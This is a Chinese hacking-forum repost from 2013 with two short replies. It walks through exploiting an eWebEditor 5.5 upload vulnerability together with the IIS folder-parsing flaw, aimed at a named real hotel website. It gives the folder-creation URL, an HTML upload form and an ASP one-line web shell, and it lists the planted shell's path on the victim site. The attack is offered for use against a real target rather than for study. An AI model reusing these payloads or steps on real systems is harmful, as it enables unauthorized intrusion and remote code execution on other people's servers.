made 发表于 2013-9-2 09:47:28

ewebeditor 5.5漏洞利用【转载】

目标站:http://www.sz-hotel.com/

网站的注入、猜帐号密码、找后台、这些不是本文重点就此略过。
此网站的ewebeditor 是5.5的

在百度搜索ewebeditor 5.5的漏洞就能找到相关的漏洞详情。

先访问这个地址:
Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=weibao.asp
访问这个地址可以建立个weibao.ASP的文件夹……
再用这个html代码上传。
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>本地提交了一个图片小马,返回空白页面,查看源码,得到小马路径。还是IIS解析漏洞~
对6.X的也管用,对ASP。aspx。JSP。均管用。


在此之前我先确定了ewebeditor 5.5所在的地址:

http://www.sz-hotel.com/admin/myeWebEditor/

PS:转入地址将会列目录。

得到漏洞地址为:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp访问这个地址可以建立个jc.asp的文件夹

在uploadfile文件目录下。因为上传的图片就在此文件下。

这样我们可以利用解析漏洞对文件夹上传图片。

在本地构架一个上传页面,代码是:
<form action="地址/path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=submit value="上传了"></input>
</form>

将这一段代码换成我们的漏洞地址:
/path/upload.asp?action=save&type=&style=样式名
换成:http://www.sz-hotel.com/admin/myeWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=jc.asp好,把文件的后缀变成htm,后打开。

上传图片网马小马大马都可以,但是上传大马因为他有一个保护措施,所以我这里就不上传大马了,上传一句话。

随便找一句话:<%eval request("pass")%>新建立一个文档,输入此一句话,然后保存为jpg后缀。

上传之后就变成空白了,然后右键查看源代码。

此地址就是网马的所在地址:http://www.sz-hotel.com/uploadfile/jc.asp/201307/20130726215332219.jpg菜刀链接


作者:Syonkforum f4ck

mojitingliu 发表于 2013-9-2 21:33:04

看起来和xycms的一个漏洞差不多

badboy 发表于 2013-10-19 19:10:41

页: [1]
查看完整版本: ewebeditor 5.5漏洞利用【转载】